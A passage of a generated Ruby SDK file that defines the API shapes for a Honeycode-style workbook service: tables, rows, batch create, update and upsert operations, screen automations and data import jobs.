BatchUpdateTableRowsResult = Shapes::StructureShape.new(name: 'BatchUpdateTableRowsResult')
BatchUpsertTableRowsRequest = Shapes::StructureShape.new(name: 'BatchUpsertTableRowsRequest')
BatchUpsertTableRowsResult = Shapes::StructureShape.new(name: 'BatchUpsertTableRowsResult')
Cell = Shapes::StructureShape.new(name: 'Cell')
CellInput = Shapes::StructureShape.new(name: 'CellInput')
Cells = Shapes::ListShape.new(name: 'Cells')
ClientRequestToken = Shapes::StringShape.new(name: 'ClientRequestToken')
ColumnMetadata = Shapes::StructureShape.new(name: 'ColumnMetadata')
CreateRowData = Shapes::StructureShape.new(name: 'CreateRowData')
CreateRowDataList = Shapes::ListShape.new(name: 'CreateRowDataList')
CreatedRowsMap = Shapes::MapShape.new(name: 'CreatedRowsMap')
DataItem = Shapes::StructureShape.new(name: 'DataItem')
DataItems = Shapes::ListShape.new(name: 'DataItems')
DelimitedTextDelimiter = Shapes::StringShape.new(name: 'DelimitedTextDelimiter')
DelimitedTextImportOptions = Shapes::StructureShape.new(name: 'DelimitedTextImportOptions')
DescribeTableDataImportJobRequest = Shapes::StructureShape.new(name: 'DescribeTableDataImportJobRequest')
DescribeTableDataImportJobResult = Shapes::StructureShape.new(name: 'DescribeTableDataImportJobResult')
DestinationOptions = Shapes::StructureShape.new(name: 'DestinationOptions')
Email = Shapes::StringShape.new(name: 'Email')
ErrorMessage = Shapes::StringShape.new(name: 'ErrorMessage')
Fact = Shapes::StringShape.new(name: 'Fact')
FailedBatchItem = Shapes::StructureShape.new(name: 'FailedBatchItem')
FailedBatchItems = Shapes::ListShape.new(name: 'FailedBatchItems')
Filter = Shapes::StructureShape.new(name: 'Filter')
Format = Shapes::StringShape.new(name: 'Format')
FormattedValue = Shapes::StringShape.new(name: 'FormattedValue')
Formula = Shapes::StringShape.new(name: 'Formula')
GetScreenDataRequest = Shapes::StructureShape.new(name: 'GetScreenDataRequest')
GetScreenDataResult = Shapes::StructureShape.new(name: 'GetScreenDataResult')
HasHeaderRow = Shapes::BooleanShape.new(name: 'HasHeaderRow')
IgnoreEmptyRows = Shapes::BooleanShape.new(name: 'IgnoreEmptyRows')
ImportColumnMap = Shapes::MapShape.new(name: 'ImportColumnMap')
ImportDataCharacterEncoding = Shapes::StringShape.new(name: 'ImportDataCharacterEncoding')
ImportDataSource = Shapes::StructureShape.new(name: 'ImportDataSource')
ImportDataSourceConfig = Shapes::StructureShape.new(name: 'ImportDataSourceConfig')
ImportJobSubmitter = Shapes::StructureShape.new(name: 'ImportJobSubmitter')
ImportOptions = Shapes::StructureShape.new(name: 'ImportOptions')
ImportSourceDataFormat = Shapes::StringShape.new(name: 'ImportSourceDataFormat')
InternalServerException = Shapes::StructureShape.new(name: 'InternalServerException')
InvokeScreenAutomationRequest = Shapes::StructureShape.new(name: 'InvokeScreenAutomationRequest')
InvokeScreenAutomationResult = Shapes::StructureShape.new(name: 'InvokeScreenAutomationResult')
JobId = Shapes::StringShape.new(name: 'JobId')
ListTableColumnsRequest = Shapes::StructureShape.new(name: 'ListTableColumnsRequest')
ListTableColumnsResult = Shapes::StructureShape.new(name: 'ListTableColumnsResult')
ListTableRowsRequest = Shapes::StructureShape.new(name: 'ListTableRowsRequest')
ListTableRowsResult = Shapes::StructureShape.new(name: 'ListTableRowsResult')
ListTablesRequest = Shapes::StructureShape.new(name: 'ListTablesRequest')
ListTablesResult = Shapes::StructureShape.new(name: 'ListTablesResult')
MaxResults = Shapes::IntegerShape.new(name: 'MaxResults')
Name = Shapes::StringShape.new(name: 'Name')
PaginationToken = Shapes::StringShape.new(name: 'PaginationToken')
QueryTableRowsRequest = Shapes::StructureShape.new(name: 'QueryTableRowsRequest')
QueryTableRowsResult = Shapes::StructureShape.new(name: 'QueryTableRowsResult')
RawValue = Shapes::StringShape.new(name: 'RawValue')
RequestTimeoutException = Shapes::StructureShape.new(name: 'RequestTimeoutException')
ResourceId = Shapes::StringShape.new(name: 'ResourceId')
ResourceIds = Shapes::ListShape.new(name: 'ResourceIds')
ResourceNotFoundException = Shapes::StructureShape.new(name: 'ResourceNotFoundException')
ResultHeader = Shapes::ListShape.new(name: 'ResultHeader')
ResultRow = Shapes::StructureShape.new(name: 'ResultRow')
ResultRows = Shapes::ListShape.new(name: 'ResultRows')
ResultSet = Shapes::StructureShape.new(name: 'ResultSet')
ResultSetMap = Shapes::MapShape.new(name: 'ResultSetMap')
RowDataInput = Shapes::MapShape.new(name: 'RowDataInput')
RowId = Shapes::StringShape.new(name: 'RowId')
RowIdList = Shapes::ListShape.new(name: 'RowIdList')
SecureURL = Shapes::StringShape.new(name: 'SecureURL')
ServiceQuotaExceededException = Shapes::StructureShape.new(name: 'ServiceQuotaExceededException')
ServiceUnavailableException = Shapes::StructureShape.new(name: 'ServiceUnavailableException')
SourceDataColumnIndex = Shapes::IntegerShape.new(name: 'SourceDataColumnIndex')
SourceDataColumnProperties = Shapes::StructureShape.new(name: 'SourceDataColumnProperties')
StartTableDataImportJobRequest = Shapes::StructureShape.new(name: 'StartTableDataImportJobRequest')
StartTableDataImportJobResult = Shapes::StructureShape.new(name: 'StartTableDataImportJobResult')
Table = Shapes::StructureShape.new(name: 'Table')
TableColumn = Shapes::StructureShape.new(name: 'TableColumn')
TableColumnName = Shapes::StringShape.new(name: 'TableColumnName')
TableColumns = Shapes::ListShape.new(name: 'TableColumns')
TableDataImportJobMessage = Shapes::StringShape.new(name: 'TableDataImportJobMessage')
TableDataImportJobMetadata = Shapes::StructureShape.new(name: 'TableDataImportJobMetadata')
TableDataImportJobStatus = Shapes::StringShape.new(name: 'TableDataImportJobStatus')
TableName = Shapes::StringShape.new(name: 'TableName')
TableRow = Shapes::StructureShape.new(name: 'TableRow')
TableRows = Shapes::ListShape.new(name: 'TableRows')
Tables = Shapes::ListShape.new(name: 'Tables')
ThrottlingException = Shapes::StructureShape.new(name: 'ThrottlingException')
TimestampInMillis = Shapes::TimestampShape.new(name: 'TimestampInMillis')
UpdateRowData = Shapes::StructureShape.new(name: 'UpdateRowData')
UpdateRowDataList = Shapes::ListShape.new(name: 'UpdateRowDataList')
UpsertAction = Shapes::StringShape.new(name: 'UpsertAction')
UpsertRowData = Shapes::StructureShape.new(name: 'UpsertRowData')
UpsertRowDataList = Shapes::ListShape.new(name: 'UpsertRowDataList')
UpsertRowsResult = Shapes::StructureShape.new(name: 'UpsertRowsResult')
UpsertRowsResultMap = Shapes::MapShape.new(name: 'UpsertRowsResultMap')
ValidationException = Shapes::StructureShape.new(name: 'ValidationException')
VariableName = Shapes::StringShape.new(name: 'VariableName')
VariableValue = Shapes::StructureShape.new(name: 'VariableValue')
VariableValueMap = Shapes::MapShape.new(name: 'VariableValueMap')
WorkbookCursor = Shapes::IntegerShape.new(name: 'WorkbookCursor')
AccessDeniedException.add_member(:message, Shapes::ShapeRef.new(shape: ErrorMessage, location_name: "message"))
AccessDeniedException.struct_class = Types::AccessDeniedException
AutomationExecutionException.add_member(:message, Shapes::ShapeRef.new(shape: ErrorMessage, location_name: "message"))
AutomationExecutionException.struct_class = Types::AutomationExecutionException
AutomationExecutionTimeoutException.add_member(:message, Shapes::ShapeRef.new(shape: ErrorMessage, location_name: "message"))
AutomationExecutionTimeoutException.struct_class = Types::AutomationExecutionTimeoutException
BatchCreateTableRowsRequest.add_member(:workbook_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "workbookId"))
BatchCreateTableRowsRequest.add_member(:table_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "tableId"))
BatchCreateTableRowsRequest.add_member(:rows_to_create, Shapes::ShapeRef.new(shape: CreateRowDataList, required: true, location_name: "rowsToCreate"))
BatchCreateTableRowsRequest.add_member(:client_request_token, Shapes::ShapeRef.new(shape: ClientRequestToken, location_name: "clientRequestToken"))
BatchCreateTableRowsRequest.struct_class = Types::BatchCreateTableRowsRequest
BatchCreateTableRowsResult.add_member(:workbook_cursor, Shapes::ShapeRef.new(shape: WorkbookCursor, required: true, location_name: "workbookCursor"))
BatchCreateTableRowsResult.add_member(:created_rows, Shapes::ShapeRef.new(shape: CreatedRowsMap, required: true, location_name: "createdRows"))
BatchCreateTableRowsResult.add_member(:failed_batch_items, Shapes::ShapeRef.new(shape: FailedBatchItems, location_name: "failedBatchItems"))
BatchCreateTableRowsResult.struct_class = Types::BatchCreateTableRowsResult
BatchDeleteTableRowsRequest.add_member(:workbook_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "workbookId"))
BatchDeleteTableRowsRequest.add_member(:table_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "tableId"))
BatchDeleteTableRowsRequest.add_member(:row_ids, Shapes::ShapeRef.new(shape: RowIdList, required: true, location_name: "rowIds"))
BatchDeleteTableRowsRequest.add_member(:client_request_token, Shapes::ShapeRef.new(shape: ClientRequestToken, location_name: "clientRequestToken"))
BatchDeleteTableRowsRequest.struct_class = Types::BatchDeleteTableRowsRequest
BatchDeleteTableRowsResult.add_member(:workbook_cursor, Shapes::ShapeRef.new(shape: WorkbookCursor, required: true, location_name: "workbookCursor"))
BatchDeleteTableRowsResult.add_member(:failed_batch_items, Shapes::ShapeRef.new(shape: FailedBatchItems, location_name: "failedBatchItems"))
BatchDeleteTableRowsResult.struct_class = Types::BatchDeleteTableRowsResult
BatchUpdateTableRowsRequest.add_member(:workbook_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "workbookId"))
BatchUpdateTableRowsRequest.add_member(:table_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "tableId"))
BatchUpdateTableRowsRequest.add_member(:rows_to_update, Shapes::ShapeRef.new(shape: UpdateRowDataList, required: true, location_name: "rowsToUpdate"))
BatchUpdateTableRowsRequest.add_member(:client_request_token, Shapes::ShapeRef.new(shape: ClientRequestToken, location_name: "clientRequestToken"))
BatchUpdateTableRowsRequest.struct_class = Types::BatchUpdateTableRowsRequest
BatchUpdateTableRowsResult.add_member(:workbook_cursor, Shapes::ShapeRef.new(shape: WorkbookCursor, required: true, location_name: "workbookCursor"))
BatchUpdateTableRowsResult.add_member(:failed_batch_items, Shapes::ShapeRef.new(shape: FailedBatchItems, location_name: "failedBatchItems"))
BatchUpdateTableRowsResult.struct_class = Types::BatchUpdateTableRowsResult
BatchUpsertTableRowsRequest.add_member(:workbook_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "workbookId"))
BatchUpsertTableRowsRequest.add_member(:table_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "tableId"))
BatchUpsertTableRowsRequest.add_member(:rows_to_upsert, Shapes::ShapeRef.new(shape: UpsertRowDataList, required: true, location_name: "rowsToUpsert"))
BatchUpsertTableRowsRequest.add_member(:client_request_token, Shapes::ShapeRef.new(shape: ClientRequestToken, location_name: "clientRequestToken"))
BatchUpsertTableRowsRequest.struct_class = Types::BatchUpsertTableRowsRequest
BatchUpsertTableRowsResult.add_member(:rows, Shapes::ShapeRef.new(shape: UpsertRowsResultMap, required: true, location_name: "rows"))
BatchUpsertTableRowsResult.add_member(:workbook_cursor, Shapes::ShapeRef.new(shape: WorkbookCursor, required: true, location_name: "workbookCursor"))
BatchUpsertTableRowsResult.add_member(:failed_batch_items, Shapes::ShapeRef.new(shape: FailedBatchItems, location_name: "failedBatchItems"))
BatchUpsertTableRowsResult.struct_class = Types::BatchUpsertTableRowsResult
Cell.add_member(:formula, Shapes::ShapeRef.new(shape: Formula, location_name: "formula"))
Cell.add_member(:format, Shapes::ShapeRef.new(shape: Format, location_name: "format"))
Cell.add_member(:raw_value, Shapes::ShapeRef.new(shape: RawValue, location_name: "rawValue"))
Cell.add_member(:formatted_value, Shapes::ShapeRef.new(shape: FormattedValue, location_name: "formattedValue"))
Cell.struct_class = Types::Cell
CellInput.add_member(:fact, Shapes::ShapeRef.new(shape: Fact, location_name: "fact"))
CellInput.struct_class = Types::CellInput
Cells.member = Shapes::ShapeRef.new(shape: Cell)
ColumnMetadata.add_member(:name, Shapes::ShapeRef.new(shape: Name, required: true, location_name: "name"))
ColumnMetadata.add_member(:format, Shapes::ShapeRef.new(shape: Format, required: true, location_name: "format"))
ColumnMetadata.struct_class = Types::ColumnMetadata
CreateRowData.add_member(:batch_item_id, Shapes::ShapeRef.new(shape: BatchItemId, required: true, location_name: "batchItemId"))
CreateRowData.add_member(:cells_to_create, Shapes::ShapeRef.new(shape: RowDataInput, required: true, location_name: "cellsToCreate"))
CreateRowData.struct_class = Types::CreateRowData
CreateRowDataList.member = Shapes::ShapeRef.new(shape: CreateRowData)
CreatedRowsMap.key = Shapes::ShapeRef.new(shape: BatchItemId)
CreatedRowsMap.value = Shapes::ShapeRef.new(shape: RowId)
DataItem.add_member(:override_format, Shapes::ShapeRef.new(shape: Format, location_name: "overrideFormat"))
DataItem.add_member(:raw_value, Shapes::ShapeRef.new(shape: RawValue, location_name: "rawValue"))
DataItem.add_member(:formatted_value, Shapes::ShapeRef.new(shape: FormattedValue, location_name: "formattedValue"))
DataItem.struct_class = Types::DataItem
DataItems.member = Shapes::ShapeRef.new(shape: DataItem)
DelimitedTextImportOptions.add_member(:delimiter, Shapes::ShapeRef.new(shape: DelimitedTextDelimiter, required: true, location_name: "delimiter"))
DelimitedTextImportOptions.add_member(:has_header_row, Shapes::ShapeRef.new(shape: HasHeaderRow, location_name: "hasHeaderRow"))
DelimitedTextImportOptions.add_member(:ignore_empty_rows, Shapes::ShapeRef.new(shape: IgnoreEmptyRows, location_name: "ignoreEmptyRows"))
DelimitedTextImportOptions.add_member(:data_character_encoding, Shapes::ShapeRef.new(shape: ImportDataCharacterEncoding, location_name: "dataCharacterEncoding"))
DelimitedTextImportOptions.struct_class = Types::DelimitedTextImportOptions
DescribeTableDataImportJobRequest.add_member(:workbook_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "workbookId"))
DescribeTableDataImportJobRequest.add_member(:table_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "tableId"))
DescribeTableDataImportJobRequest.add_member(:job_id, Shapes::ShapeRef.new(shape: JobId, required: true, location: "uri", location_name: "jobId"))
DescribeTableDataImportJobRequest.struct_class = Types::DescribeTableDataImportJobRequest
DescribeTableDataImportJobResult.add_member(:job_status, Shapes::ShapeRef.new(shape: TableDataImportJobStatus, required: true, location_name: "jobStatus"))
DescribeTableDataImportJobResult.add_member(:message, Shapes::ShapeRef.new(shape: TableDataImportJobMessage, required: true, location_name: "message"))
DescribeTableDataImportJobResult.add_member(:job_metadata, Shapes::ShapeRef.new(shape: TableDataImportJobMetadata, required: true, location_name: "jobMetadata"))
DescribeTableDataImportJobResult.struct_class = Types::DescribeTableDataImportJobResult
DestinationOptions.add_member(:column_map, Shapes::ShapeRef.new(shape: ImportColumnMap, location_name: "columnMap"))
DestinationOptions.struct_class = Types::DestinationOptions
FailedBatchItem.add_member(:id, Shapes::ShapeRef.new(shape: BatchItemId, required: true, location_name: "id"))
FailedBatchItem.add_member(:error_message, Shapes::ShapeRef.new(shape: BatchErrorMessage, required: true, location_name: "errorMessage"))
FailedBatchItem.struct_class = Types::FailedBatchItem
FailedBatchItems.member = Shapes::ShapeRef.new(shape: FailedBatchItem)
Filter.add_member(:formula, Shapes::ShapeRef.new(shape: Formula, required: true, location_name: "formula"))
Filter.add_member(:context_row_id, Shapes::ShapeRef.new(shape: RowId, location_name: "contextRowId"))
Filter.struct_class = Types::Filter
GetScreenDataRequest.add_member(:workbook_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location_name: "workbookId"))
GetScreenDataRequest.add_member(:app_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location_name: "appId"))
GetScreenDataRequest.add_member(:screen_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location_name: "screenId"))
GetScreenDataRequest.add_member(:variables, Shapes::ShapeRef.new(shape: VariableValueMap, location_name: "variables"))
GetScreenDataRequest.add_member(:max_results, Shapes::ShapeRef.new(shape: MaxResults, location_name: "maxResults"))
GetScreenDataRequest.add_member(:next_token, Shapes::ShapeRef.new(shape: PaginationToken, location_name: "nextToken"))
GetScreenDataRequest.struct_class = Types::GetScreenDataRequest
GetScreenDataResult.add_member(:results, Shapes::ShapeRef.new(shape: ResultSetMap, required: true, location_name: "results"))
GetScreenDataResult.add_member(:workbook_cursor, Shapes::ShapeRef.new(shape: WorkbookCursor, required: true, location_name: "workbookCursor"))
GetScreenDataResult.add_member(:next_token, Shapes::ShapeRef.new(shape: PaginationToken, location_name: "nextToken"))
GetScreenDataResult.struct_class = Types::GetScreenDataResult
ImportColumnMap.key = Shapes::ShapeRef.new(shape: ResourceId)
ImportColumnMap.value = Shapes::ShapeRef.new(shape: SourceDataColumnProperties)
ImportDataSource.add_member(:data_source_config, Shapes::ShapeRef.new(shape: ImportDataSourceConfig, required: true, location_name: "dataSourceConfig"))
ImportDataSource.struct_class = Types::ImportDataSource
ImportDataSourceConfig.add_member(:data_source_url, Shapes::ShapeRef.new(shape: SecureURL, location_name: "dataSourceUrl"))
ImportDataSourceConfig.struct_class = Types::ImportDataSourceConfig
ImportJobSubmitter.add_member(:email, Shapes::ShapeRef.new(shape: Email, location_name: "email"))
ImportJobSubmitter.add_member(:user_arn, Shapes::ShapeRef.new(shape: AwsUserArn, location_name: "userArn"))
ImportJobSubmitter.struct_class = Types::ImportJobSubmitter
ImportOptions.add_member(:destination_options, Shapes::ShapeRef.new(shape: DestinationOptions, location_name: "destinationOptions"))
ImportOptions.add_member(:delimited_text_options, Shapes::ShapeRef.new(shape: DelimitedTextImportOptions, location_name: "delimitedTextOptions"))
ImportOptions.struct_class = Types::ImportOptions
InternalServerException.add_member(:message, Shapes::ShapeRef.new(shape: ErrorMessage, location_name: "message"))
InternalServerException.struct_class = Types::InternalServerException
InvokeScreenAutomationRequest.add_member(:workbook_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "workbookId"))
InvokeScreenAutomationRequest.add_member(:app_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "appId"))
InvokeScreenAutomationRequest.add_member(:screen_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "screenId"))
InvokeScreenAutomationRequest.add_member(:screen_automation_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "automationId"))
InvokeScreenAutomationRequest.add_member(:variables, Shapes::ShapeRef.new(shape: VariableValueMap, location_name: "variables"))
InvokeScreenAutomationRequest.add_member(:row_id, Shapes::ShapeRef.new(shape: RowId, location_name: "rowId"))
InvokeScreenAutomationRequest.add_member(:client_request_token, Shapes::ShapeRef.new(shape: ClientRequestToken, location_name: "clientRequestToken"))
InvokeScreenAutomationRequest.struct_class = Types::InvokeScreenAutomationRequest
InvokeScreenAutomationResult.add_member(:workbook_cursor, Shapes::ShapeRef.new(shape: WorkbookCursor, required: true, location_name: "workbookCursor"))
InvokeScreenAutomationResult.struct_class = Types::InvokeScreenAutomationResult
ListTableColumnsRequest.add_member(:workbook_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "workbookId"))
ListTableColumnsRequest.add_member(:table_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "tableId"))
ListTableColumnsRequest.add_member(:next_token, Shapes::ShapeRef.new(shape: PaginationToken, location: "querystring", location_name: "nextToken"))
ListTableColumnsRequest.struct_class = Types::ListTableColumnsRequest
ListTableColumnsResult.add_member(:table_columns, Shapes::ShapeRef.new(shape: TableColumns, required: true, location_name: "tableColumns"))
ListTableColumnsResult.add_member(:next_token, Shapes::ShapeRef.new(shape: PaginationToken, location_name: "nextToken"))
ListTableColumnsResult.add_member(:workbook_cursor, Shapes::ShapeRef.new(shape: WorkbookCursor, location_name: "workbookCursor"))
ListTableColumnsResult.struct_class = Types::ListTableColumnsResult
ListTableRowsRequest.add_member(:workbook_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "workbookId"))
ListTableRowsRequest.add_member(:table_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "tableId"))
ListTableRowsRequest.add_member(:row_ids, Shapes::ShapeRef.new(shape: RowIdList, location_name: "rowIds"))
ListTableRowsRequest.add_member(:max_results, Shapes::ShapeRef.new(shape: MaxResults, location_name: "maxResults"))
ListTableRowsRequest.add_member(:next_token, Shapes::ShapeRef.new(shape: PaginationToken, location_name: "nextToken"))
ListTableRowsRequest.struct_class = Types::ListTableRowsRequest
ListTableRowsResult.add_member(:column_ids, Shapes::ShapeRef.new(shape: ResourceIds, required: true, location_name: "columnIds"))
ListTableRowsResult.add_member(:rows, Shapes::ShapeRef.new(shape: TableRows, required: true, location_name: "rows"))
ListTableRowsResult.add_member(:row_ids_not_found, Shapes::ShapeRef.new(shape: RowIdList, location_name: "rowIdsNotFound"))
ListTableRowsResult.add_member(:next_token, Shapes::ShapeRef.new(shape: PaginationToken, location_name: "nextToken"))
ListTableRowsResult.add_member(:workbook_cursor, Shapes::ShapeRef.new(shape: WorkbookCursor, required: true, location_name: "workbookCursor"))
ListTableRowsResult.struct_class = Types::ListTableRowsResult
ListTablesRequest.add_member(:workbook_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "workbookId"))
ListTablesRequest.add_member(:max_results, Shapes::ShapeRef.new(shape: MaxResults, location: "querystring", location_name: "maxResults"))
ListTablesRequest.add_member(:next_token, Shapes::ShapeRef.new(shape: PaginationToken, location: "querystring", location_name: "nextToken"))
ListTablesRequest.struct_class = Types::ListTablesRequest
ListTablesResult.add_member(:tables, Shapes::ShapeRef.new(shape: Tables, required: true, location_name: "tables"))
ListTablesResult.add_member(:next_token, Shapes::ShapeRef.new(shape: PaginationToken, location_name: "nextToken"))
ListTablesResult.add_member(:workbook_cursor, Shapes::ShapeRef.new(shape: WorkbookCursor, location_name: "workbookCursor"))
ListTablesResult.struct_class = Types::ListTablesResult
QueryTableRowsRequest.add_member(:workbook_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "workbookId"))
QueryTableRowsRequest.add_member(:table_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "tableId"))
QueryTableRowsRequest.add_member(:filter_formula, Shapes::ShapeRef.new(shape: Filter, required: true, location_name: "filterFormula"))
QueryTableRowsRequest.add_member(:max_results, Shapes::ShapeRef.new(shape: MaxResults, location_name: "maxResults"))
QueryTableRowsRequest.add_member(:next_token, Shapes::ShapeRef.new(shape: PaginationToken, location_name: "nextToken"))
QueryTableRowsRequest.struct_class = Types::QueryTableRowsRequest
QueryTableRowsResult.add_member(:column_ids, Shapes::ShapeRef.new(shape: ResourceIds, required: true, location_name: "columnIds"))
QueryTableRowsResult.add_member(:rows, Shapes::ShapeRef.new(shape: TableRows, required: true, location_name: "rows"))
QueryTableRowsResult.add_member(:next_token, Shapes::ShapeRef.new(shape: PaginationToken, location_name: "nextToken"))
QueryTableRowsResult.add_member(:workbook_cursor, Shapes::ShapeRef.new(shape: WorkbookCursor, required: true, location_name: "workbookCursor"))
QueryTableRowsResult.struct_class = Types::QueryTableRowsResult
RequestTimeoutException.add_member(:message, Shapes::ShapeRef.new(shape: ErrorMessage, location_name: "message"))
RequestTimeoutException.struct_class = Types::RequestTimeoutException
ResourceIds.member = Shapes::ShapeRef.new(shape: ResourceId)
ResourceNotFoundException.add_member(:message, Shapes::ShapeRef.new(shape: ErrorMessage, location_name: "message"))
ResourceNotFoundException.struct_class = Types::ResourceNotFoundException
ResultHeader.member = Shapes::ShapeRef.new(shape: ColumnMetadata)
ResultRow.add_member(:row_id, Shapes::ShapeRef.new(shape: RowId, location_name: "rowId"))
ResultRow.add_member(:data_items, Shapes::ShapeRef.new(shape: DataItems, required: true, location_name: "dataItems"))
ResultRow.struct_class = Types::ResultRow
ResultRows.member = Shapes::ShapeRef.new(shape: ResultRow)
ResultSet.add_member(:headers, Shapes::ShapeRef.new(shape: ResultHeader, required: true, location_name: "headers"))
ResultSet.add_member(:rows, Shapes::ShapeRef.new(shape: ResultRows, required: true, location_name: "rows"))
ResultSet.struct_class = Types::ResultSet
ResultSetMap.key = Shapes::ShapeRef.new(shape: Name)
ResultSetMap.value = Shapes::ShapeRef.new(shape: ResultSet)
RowDataInput.key = Shapes::ShapeRef.new(shape: ResourceId)
RowDataInput.value = Shapes::ShapeRef.new(shape: CellInput)
RowIdList.member = Shapes::ShapeRef.new(shape: RowId)
ServiceQuotaExceededException.add_member(:message, Shapes::ShapeRef.new(shape: ErrorMessage, required: true, location_name: "message"))
ServiceQuotaExceededException.struct_class = Types::ServiceQuotaExceededException
ServiceUnavailableException.add_member(:message, Shapes::ShapeRef.new(shape: ErrorMessage, location_name: "message"))
ServiceUnavailableException.struct_class = Types::ServiceUnavailableException
SourceDataColumnProperties.add_member(:column_index, Shapes::ShapeRef.new(shape: SourceDataColumnIndex, location_name: "columnIndex"))
SourceDataColumnProperties.struct_class = Types::SourceDataColumnProperties
StartTableDataImportJobRequest.add_member(:workbook_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "workbookId"))
StartTableDataImportJobRequest.add_member(:data_source, Shapes::ShapeRef.new(shape: ImportDataSource, required: true, location_name: "dataSource"))
StartTableDataImportJobRequest.add_member(:data_format, Shapes::ShapeRef.new(shape: ImportSourceDataFormat, required: true, location_name: "dataFormat"))
StartTableDataImportJobRequest.add_member(:destination_table_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "tableId"))
StartTableDataImportJobRequest.add_member(:import_options, Shapes::ShapeRef.new(shape: ImportOptions, required: true, location_name: "importOptions"))
StartTableDataImportJobRequest.add_member(:client_request_token, Shapes::ShapeRef.new(shape: ClientRequestToken, required: true, location_name: "clientRequestToken"))
StartTableDataImportJobRequest.struct_class = Types::StartTableDataImportJobRequest
StartTableDataImportJobResult.add_member(:job_id, Shapes::ShapeRef.new(shape: JobId, required: true, location_name: "jobId"))
StartTableDataImportJobResult.add_member(:job_status, Shapes::ShapeRef.new(shape: TableDataImportJobStatus, required: true, location_name: "jobStatus"))
StartTableDataImportJobResult.struct_class = Types::StartTableDataImportJobResult
Table.add_member(:table_id, Shapes::ShapeRef.new(shape: ResourceId, location_name: "tableId"))
Table.add_member(:table_name, Shapes::ShapeRef.new(shape: TableName, location_name: "tableName"))
Table.struct_class = Types::Table
TableColumn.add_member(:table_column_id, Shapes::ShapeRef.new(shape: ResourceId, location_name: "tableColumnId"))
TableColumn.add_member(:table_column_name, Shapes::ShapeRef.new(shape: TableColumnName, location_name: "tableColumnName"))
TableColumn.add_member(:format, Shapes::ShapeRef.new(shape: Format, location_name: "format"))
TableColumn.struct_class = Types::TableColumn
TableColumns.member = Shapes::ShapeRef.new(shape: TableColumn)
TableDataImportJobMetadata.add_member(:submitter, Shapes::ShapeRef.new(shape: ImportJobSubmitter, required: true, location_name: "submitter"))
TableDataImportJobMetadata.add_member(:submit_time, Shapes::ShapeRef.new(shape: TimestampInMillis, required: true, location_name: "submitTime"))
TableDataImportJobMetadata.add_member(:import_options, Shapes::ShapeRef.new(shape: ImportOptions, required: true, location_name: "importOptions"))
TableDataImportJobMetadata.add_member(:data_source, Shapes::ShapeRef.new(shape: ImportDataSource, required: true, location_name: "dataSource"))
TableDataImportJobMetadata.struct_class = Types::TableDataImportJobMetadata
TableRow.add_member(:row_id, Shapes::ShapeRef.new(shape: RowId, required: true, location_name: "rowId"))
TableRow.add_member(:cells, Shapes::ShapeRef.new(shape: Cells, required: true, location_name: "cells"))
TableRow.struct_class = Types::TableRow
TableRows.member = Shapes::ShapeRef.new(shape: TableRow)
Tables.member = Shapes::ShapeRef.new(shape: Table)
ThrottlingException.add_member(:message, Shapes::ShapeRef.new(shape: ErrorMessage, location_name: "message"))
ThrottlingException.struct_class = Types::ThrottlingException
UpdateRowData.add_member(:row_id, Shapes::ShapeRef.new(shape: RowId, required: true, location_name: "rowId"))
UpdateRowData.add_member(:cells_to_update, Shapes::ShapeRef.new(shape: RowDataInput, required: true, location_name: "cellsToUpdate"))
UpdateRowData.struct_class = Types::UpdateRowData
UpdateRowDataList.member = Shapes::ShapeRef.new(shape: UpdateRowData)
UpsertRowData.add_member(:batch_item_id, Shapes::ShapeRef.new(shape: BatchItemId, required: true, location_name: "batchItemId"))
UpsertRowData.add_member(:filter, Shapes::ShapeRef.new(shape: Filter, required: true, location_name: "filter"))
UpsertRowData.add_member(:cells_to_update, Shapes::ShapeRef.new(shape: RowDataInput, required: true, location_name: "cellsToUpdate"))
UpsertRowData.struct_class = Types::UpsertRowData
UpsertRowDataList.member = Shapes::ShapeRef.new(shape: UpsertRowData)
UpsertRowsResult.add_member(:row_ids, Shapes::ShapeRef.new(shape: RowIdList, required: true, location_name: "rowIds"))
UpsertRowsResult.add_member(:upsert_action, Shapes::ShapeRef.new(shape: UpsertAction, required: true, location_name: "upsertAction"))
UpsertRowsResult.struct_class = Types::UpsertRowsResult
UpsertRowsResultMap.key = Shapes::ShapeRef.new(shape: BatchItemId)
UpsertRowsResultMap.value = Shapes::ShapeRef.new(shape: UpsertRowsResult)
ValidationException.add_member(:message, Shapes::ShapeRef.new(shape: ErrorMessage, required: true, location_name: "message"))
ValidationException.struct_class = Types::ValidationException
VariableValue.add_member(:raw_value, Shapes::ShapeRef.new(shape: RawValue, required: true, location_name: "rawValue"))
VariableValue.struct_class = Types::VariableValue
VariableValueMap.key = Shapes::ShapeRef.new(shape: VariableName)
VariableValueMap.value = Shapes::ShapeRef.new(shape: VariableValue)
# @api private
